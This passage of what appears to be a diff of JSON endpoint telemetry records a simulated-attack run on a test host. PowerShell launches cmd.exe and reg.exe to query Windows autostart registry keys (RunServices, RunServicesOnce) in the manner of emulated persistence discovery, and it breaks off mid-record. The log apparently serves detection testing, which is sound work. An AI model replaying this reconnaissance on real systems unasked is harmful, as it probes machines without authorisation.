"image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571310890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571310890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571310890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571310890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571310890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" - }, - { - "command_line": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6392, - "ppid": 4708, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571311040000, - "unique_pid": 
"{42FC7E13-CB0B-5C05-0000-0010CCA75001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571310890000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311050000, - 
"unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "process", - "pid": 6392, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571311050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" - }, - { - "event_type": "process", - "pid": 4708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571311050000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7316, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571311200016, - 
"unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7316, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7316, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7316, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7316, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7316, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" - }, - { - "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": 
"C:\\Windows\\System32\\cmd.exe", - "pid": 400, - "ppid": 7316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571311299984, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001020A95001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "image_load", - 
"image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311210000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "process", - "pid": 400, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571311360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" - }, - { - "event_type": "process", - "pid": 7316, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571311360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": 
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5512, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571311439984, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5512, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5512, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5512, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5512, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5512, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311360000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" - }, - { 
- "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7408, - "ppid": 5512, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571311550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 7408, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7408, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7408, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7408, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7408, - 
"process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 7408, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 7408, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7408, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7408, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "process", - "pid": 7408, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" - }, - { - "event_type": "process", - "pid": 5512, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571311520000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query 
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2528, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571311710000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2528, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311680000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2528, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311680000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2528, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311680000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2528, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311680000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 
2528, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311680000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" - }, - { - "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5276, - "ppid": 2528, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571311800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311680000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311680000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311680000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311680000, - "unique_pid": 
"{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311830000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311830000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311830000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311830000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311830000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "process", - "pid": 5276, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571311830000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" - }, - { - "event_type": "process", - "pid": 2528, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": 
"terminate", - "timestamp": 131883571311830000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6296, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571311970000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311830000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311830000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311990000, - 
"unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" - }, - { - "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5520, - "ppid": 6296, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571312070000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001004B05001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 5520, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5520, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5520, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": 
"C:\\Windows\\System32\\KernelBase.dll", - "pid": 5520, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5520, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 5520, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 5520, - "process_name": 